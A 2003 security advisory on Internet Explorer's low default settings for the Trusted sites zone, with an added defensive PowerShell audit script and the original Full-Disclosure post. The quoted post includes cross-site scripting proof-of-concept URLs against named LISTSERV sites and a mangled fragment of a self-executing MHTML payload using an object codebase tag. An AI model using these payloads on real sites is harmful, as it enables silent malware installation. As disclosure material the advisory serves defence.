Microsoft Internet Explorer Trusted Domain Default Settings Facilitate Silent Installation of Executables

SecurityTracker Alert ID: 1008558

CVE Reference: GENERIC-MAP-NOMATCH

Date: Dec 27 2003

Impact: Modification of system information, Modification of user information

Description: An exploit method was reported in Microsoft Internet Explorer that illustrates IE's weak default settings for the 'Trusted Site' security zone. A remote user can create HTML that will cause an arbitrary executable to be silently downloaded to and installed on a target user's system.

http-equiv reported that a remote user can create HTML that, when loaded by a target user, will trigger the flaw and install arbitrary code on the target user's system, potentially in an arbitrary security domain.

With the assistance of a cross-site scripting flaw in a web site designated as a 'trusted site' domain, a remote user can display HTML containing a '<object classid="" codebase="">' tag to install an executable file within an arbitrary security zone [if a web site in the security zone suffers from cross-site scripting flaws]. If the site is in the 'Internet' zone, the target user may be prompted for installation, but if the site is in the 'trusted site' domain, the target user will not be prompted, according to the report.

The executable will reportedly be installed in the Temporary Internet File directory associated with a trusted zone.
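
A defender-side check for the condition described above, as an added example that is not part of the SecurityTracker entry or the original report: the PowerShell below reads the current user's Trusted sites zone (registry zone 2), reports its security level and ActiveX download and run settings, and lists the sites mapped into that zone. It assumes per-user settings under HKCU; values enforced through policy keys are not examined.

```powershell
# Added example (not from the advisory): audit the current user's IE
# "Trusted sites" zone, which the registry stores as zone 2.
$inet    = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
$zoneKey = Join-Path $inet 'Zones\2'

# Zone template levels and per-action settings as stored in the registry.
$levels   = @{ 0 = 'Custom'; 0x10000 = 'Low'; 0x10500 = 'Medium-low'
               0x11000 = 'Medium'; 0x11500 = 'Medium-high'; 0x12000 = 'High' }
$settings = @{ 0 = 'Enabled, no prompt'; 1 = 'Prompt'; 3 = 'Disabled' }
$actions  = [ordered]@{
    '1001' = 'Download signed ActiveX controls'
    '1004' = 'Download unsigned ActiveX controls'
    '1200' = 'Run ActiveX controls and plug-ins'
    '1201' = 'Initialize and script ActiveX controls not marked as safe'
}

$zone  = Get-ItemProperty -Path $zoneKey -ErrorAction Stop
$level = $levels[[int]$zone.CurrentLevel]
if (-not $level) { $level = 'Unknown (0x{0:X})' -f [int]$zone.CurrentLevel }
Write-Host "Trusted sites zone level: $level"

# One row per ActiveX-related action; Silent = content is handled with no prompt.
$report = foreach ($id in $actions.Keys) {
    $raw = $zone.$id
    [pscustomobject]@{
        Action  = $id
        Meaning = $actions[$id]
        Setting = if ($null -eq $raw) { 'Not set' } else { $settings[[int]$raw] }
        Silent  = ($raw -eq 0)
    }
}
$report | Format-Table -AutoSize

# Sites mapped into zone 2. An XSS flaw on any of them runs with the settings above.
$domains = Join-Path $inet 'ZoneMap\Domains'
Get-ChildItem -Path $domains -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    $key = $_
    foreach ($scheme in $key.GetValueNames()) {
        $value = $key.GetValue($scheme)
        if ($value -is [int] -and $value -eq 2) {
            # Subkeys are stored as Domains\<domain>\<host>; rebuild host.domain.
            $parts = ($key.Name -split '\\Domains\\', 2)[1] -split '\\'
            [array]::Reverse($parts)
            '{0}://{1}' -f $scheme, ($parts -join '.')
        }
    }
}
```

Rows with Silent = True on actions 1001 or 1004 correspond to the no-prompt install behaviour the report attributes to the trusted zone.
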

Impact: A remote user can cause arbitrary binaries to be silently downloaded and installed on the target user's system.

Solution: No solution was available at the time of this entry.

Vendor URL: www.microsoft.com/technet/security/

Cause: Access control error

Underlying OS: Windows (Any)

Reported By: "http-equiv@excite.com" <1@malware.com>

Message History: None.

Source Message Contents

Date: Fri, 26 Dec 2003 17:02:55 -0000
From: "http-equiv@excite.com" <1@malware.com>
Subject: [Full-Disclosure] DANGER ZONE: Internet Explorer
Friday, December 26, 2003
Technical 'silent delivery and installation of an executable on a
target computer. No client input other than viewing a web site'.
This may be achieved with the Internet Explorer series of so-
called "browsers", all security settings set to HIGH !
[***premium advertising space: your ad here for a nominal monthly
fee contact sales@malware.com***]
Not so simple:
The current trend is to dismiss, pooh pooh, the never-ending ongoing
[almost daily] discoveries of vulnerabilities in the Internet
Explorer series of browsers. So much so there remains in the account
a balance of several full and complete remote compromises [courtesy
of: Liu Die Yu
http://www.safecenter.net/UMBRELLAWEBV4/DirSvc/security/originality/microsoft_ie/index.html]
summarily dismissed as "well the internet is
a big bad place, don't surf to unknown sites, and sites you do know
and trust, place in the Trusted Zone. You'll be fine. 'Trust Us !"".
Oh. Okay:
The so-called "Trusted Site" zone setting in the Internet Explorer
series of browsers, is set to LOW on default [screenshot:
http://www.malware.com/trustus.png 28KB]. What that means
is 'minimal safeguards and prompts are provided...most content is
downloaded and run without prompts'. So who do [can] we trust?
For example, we input into the so-called Trusted Zone, the
manufacturer commonly known as Microsoft Dot Com [screenshot:
http://www.malware.com/havefaith.png 15KB]. In fact this peculiar
method and remedy of participating in the World Wide Web is
recommended by the brains behind the manufacturer commonly known
as Microsoft Dot Com.
Now what:
There is a small yet critical bug in the mailing list software
called LISTSERV from http://www.lsoft.com/. A trivial yet important
ability to effect the common so-called 'cross site scripting' [see:
http://www.cert.org/advisories/CA-2000-02.html] 'malicious html tag
embedding in client web requests':
Microsoft.com uses the mailing list software called LISTSERV. So do
some 300,000 combined public and local others [Note: These numbers
do not include Intranet servers]. Banks. Governments. Schools etc
[see: http://www.lsoft.com/customer/clientlist.asp].
So:
So what that means is if we 'trust' our government, or trust our
bank or our school or even our software 'manufacturer', we are
advised to place everyone else in the 'restricted zone' and our
trusted sites in the 'trusted zone' where: 'minimal safeguards and
prompts are provided...most content is downloaded and run without
prompts'.
Example:
http://discuss.microsoft.com/SCRIPTS/WA-MSD.EXE?A0=<IMG%
20SRC=javascript:document['write'](location)>&T=malware is in the
zone<object>
http://lists.state.gov/SCRIPTS/WA-USIAINFO.EXE?
A1=<img>ind0312d&L=dosback
http://demo.lsoft.com/Scripts/wa-demo.exe?A1=ind9807&L=demo<img>
What that means is we can install via
<object classid="" codebase=""> any executable file from within the
same domain as we see fit. The same domain in the so-called 'Trusted
Site' zone that is. Be it *.gov. *.microsoft.com, *.edu et cetera.
Technically our codebase cannot point to a remote site outside the
zone as it will be cached in the Temporary Internet File [TIF] and
will prompt for install as that remote site is in the Internet Zone.
However, theoretically we can play havoc within our *.gov and .edu
domains on one another. More importantly, we might very well be
able to write our entire Self-Executing HTML file into all of these
domains:
MIME-Version: 1.0
Content-Location:fi le:///m alware.exe
Content-Transfer-Encoding: base64
TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+
zBqcgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB5AAA
AngAAAAAAAAAAAAAAAAA=/www.malware.com/ /
<o bjec t CLAS SID="CLSID:5 5 5 5 5 5 5 5 - 5 5 5 5"
code base="mhtml:'+path+'">
In which case the entire package will be cached in the TIF under the
disguise of a so-called 'TRUSTED ZONE' !
Don't trust us. Trust them.
[***less than premium advertising space: your ad here for a nominal
monthly fee contact sales@malware.com***]
Happy New Year and be safe out there. It's not what it all seems.
End Call
--
http://www.malware.com